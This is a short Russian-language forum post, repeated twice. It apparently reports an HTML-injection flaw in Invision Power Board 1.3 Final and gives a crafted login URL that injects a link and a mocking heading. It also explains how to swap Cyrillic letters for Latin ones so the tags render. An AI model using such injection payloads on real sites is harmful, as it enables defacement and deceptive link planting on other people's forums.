Я могу ошибаться, но не может ли быть потенциальной уязвимостью следующий запрос??:
http://имя_сайта/forum/index.php?act=Login&CODE=04&.<а%20href='http://имя_сайта/forum/index.php?act=Reg&CODE=10'><h1>Я_люблю_Invision_Power_Board!
_Он_Дырявый!</h1></а>
Внимание: поставьте </а> и <a> в этой строчке английскими, а то они ТУТ приведены русские, тк форум эти конструкции в английской форме заменяет на url= (итересно, правда...?!?)
Работает точно на всех 1.3 Final. Хотя может просто лажа какая то. В этом случае прошу не пинать.
http://имя_сайта/forum/index.php?act=Login&CODE=04&.<а%20href='http://имя_сайта/forum/index.php?act=Reg&CODE=10'><h1>Я_люблю_Invision_Power_Board!
_Он_Дырявый!</h1></а>
Внимание: поставьте </а> и <a> в этой строчке английскими, а то они ТУТ приведены русские, тк форум эти конструкции в английской форме заменяет на url= (итересно, правда...?!?)
Работает точно на всех 1.3 Final. Хотя может просто лажа какая то. В этом случае прошу не пинать.